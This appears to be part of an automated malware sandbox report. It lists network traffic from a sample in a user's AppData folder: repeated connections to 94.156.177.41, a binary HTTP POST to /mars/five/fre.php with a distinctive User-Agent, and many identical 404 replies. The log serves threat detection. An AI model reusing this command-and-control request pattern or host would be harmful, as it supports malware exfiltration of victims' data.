Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41

Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

Code function: 13_2_00404ED4 recv,

13_2_00404ED4

Source: unknown

HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
